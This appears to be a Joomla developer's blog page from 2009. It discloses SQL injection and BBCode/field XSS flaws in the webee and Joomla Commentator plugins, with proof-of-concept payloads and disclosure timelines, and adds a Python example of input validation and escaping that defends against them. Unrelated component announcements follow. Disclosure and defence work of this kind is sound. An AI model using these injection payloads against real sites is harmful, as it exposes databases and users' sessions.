webee 1.1.1, a Joomla commenting plugin, suffers from multiple vulnerabilities.
SQL Injection
The 'articleId' parameter is not sanitized before being used in a query:
index2.php?option=com_webeecomment&task=default&articleId=999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 --
[img] BBCode [color] Tag XSS
[color=red;xss:expression(window.r?0:(alert(String.fromCharCode(88,83,83)),window.r=1))]XSS[/color]
[url] BBCode [img] Tag XSS
[img]http://foo.com/fake.png"/onerror="alert(String.fromCharCode(88,83,83))[/img]
[size] BBCode [url] Tag XSS
[url="/onmouseover="alert(String.fromCharCode(88,83,83))]XSS[/url]
UPDATE: webee has been updated to 1.2 as of 12 November 2009 and still suffers from SQL Injection. XSS was not tested in 1.2.
Timeline
- Vulnerabilities Discovered: 4 November 2009
- Vendor Notified: 4 November 2009
- Vendor Notified Again: 9 November 2009
- Vendor Response: ... 2009
- Update Available: ... 2009
- Disclosure: 15 November 2009
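One defensive way to handle both issues above, added here as an example and not code from webee or from this site: accept articleId only as a plain integer, and validate every BBCode tag argument against an allow-list before any HTML is emitted, escaping all other text. It is written in Python rather than the component's PHP so the logic runs stand-alone; the colour list, URL pattern and tag grammar are this example's own assumptions.

```python
import html
import re
from urllib.parse import urlparse
# Allow-lists and patterns below are this example's own choices (constructed), not webee's.
NAMED_COLORS = {"red", "green", "blue", "black", "white", "yellow", "orange"}
HEX_COLOR = re.compile(r"#[0-9a-f]{3}(?:[0-9a-f]{3})?\Z")
PLAIN_URL = re.compile(r"https?://[^\s\"'<>]+\Z")
TAG = re.compile(
    r"\[color=([^\]]*)\](.*?)\[/color\]"     # [color=arg]body[/color]
    r"|\[img\]([^\[\]]*)\[/img\]"             # [img]src[/img]
    r"|\[url=([^\]]*)\](.*?)\[/url\]", re.S)  # [url=arg]body[/url]

def parse_article_id(raw):
    """Accept articleId only as a plain decimal integer; a UNION SELECT suffix never reaches the query."""
    return int(raw) if raw.isdigit() else None

def valid_color(value):
    """Named colour or hex triplet only, so a value carrying ';' or expression() is refused."""
    v = value.strip().lower()
    return v in NAMED_COLORS or bool(HEX_COLOR.match(v))

def valid_url(value):
    """Absolute http(s) URL with a host and no quote, space or angle bracket,
    so javascript: URLs and attribute break-outs are both refused."""
    v = value.strip().strip('"')
    p = urlparse(v)
    return bool(PLAIN_URL.match(v)) and p.scheme in ("http", "https") and bool(p.netloc)

def render_tag(m):
    """Emit HTML for a validated tag; an invalid tag is shown as escaped literal text."""
    color_arg, color_body, img_src, url_arg, url_body = m.groups()
    if color_arg is not None and valid_color(color_arg):
        return '<span style="color:%s">%s</span>' % (color_arg.strip().lower(), html.escape(color_body))
    if img_src is not None and valid_url(img_src):
        return '<img src="%s" alt="">' % html.escape(img_src.strip().strip('"'))
    if url_arg is not None and valid_url(url_arg):
        return '<a href="%s">%s</a>' % (html.escape(url_arg.strip().strip('"')), html.escape(url_body))
    return html.escape(m.group(0))

def render_bbcode(text):
    """Convert the three tags to HTML. Text outside tags, tag bodies and tag arguments
    are all HTML-escaped, so user input can never close a generated attribute."""
    out, pos = [], 0
    for m in TAG.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        out.append(render_tag(m))
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)
```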
Sunday, 15 November 2009 00:00
Joomla Commentator 1.1b3, a Joomla commenting plugin, suffers from an XSS vulnerability in its "title" field that could let an attacker run script in an administrator's session.
title"/onmouseover="alert(/xss/.source)
Timeline
Last Updated on Thursday, 30 September 2010 17:35
Sunday, 08 November 2009 18:56
I am proud to announce the release of JMyLife 1.0, a new Joomla component by yours truly! JMyLife aims to replicate the functionality of fmylife.com in a Joomla 1.5 native component! There are 2 versions available: JMyLife 1.0 FREE, which has the bare essentials, and JMyLife 1.0 Pro, with all the bells and whistles! View the demo here - JMyLife Component Demo.
Overview of Features
When you purchase the Pro version, ALL minor updates (until 1.1) will be included, and you will be supporting future development of this project.
Last Updated on Thursday, 12 November 2009 11:56
Friday, 06 November 2009 23:55
I was doing some restructuring to my soon-to-be-released Joomla component, JMyLife, and wanted to have a select item in the configuration view in order to allow the admin to select a page to direct users to as a "sign up" page. I originally had this item as part of the global view parameters, but I was having issues with Menu Items overriding the global values on specific views. I started digging through the Joomla API documents, expecting to find a simple JHTML statement I could use to produce this form element, but couldn't. I ended up with a solution that works, though I wish it were a bit easier.
Last Updated on Saturday, 07 November 2009 04:19
Thursday, 29 October 2009 09:34
As part of a recent project, I needed to open a modal window using JavaScript. Here's how I did it.
Last Updated on Monday, 07 December 2009 12:44
The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.